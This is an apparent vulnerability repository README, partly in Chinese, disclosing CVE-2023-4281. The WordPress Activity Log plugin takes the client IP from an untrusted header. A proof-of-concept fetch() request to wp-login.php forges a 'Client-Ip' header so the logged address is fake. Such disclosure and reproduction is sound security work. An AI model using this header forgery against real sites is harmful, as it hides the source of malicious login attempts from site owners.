
Repository for CVE-2023-4281 vulnerability.
CVE编号: CVE-2023-4281
漏洞类型: IP地址欺骗
描述: Activity Log 插件从潜在不可信的头部中获取客户端 IP 地址,攻击者可操纵其值。这可能被用于隐藏恶意流量的来源。
复现步骤:
Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
参考: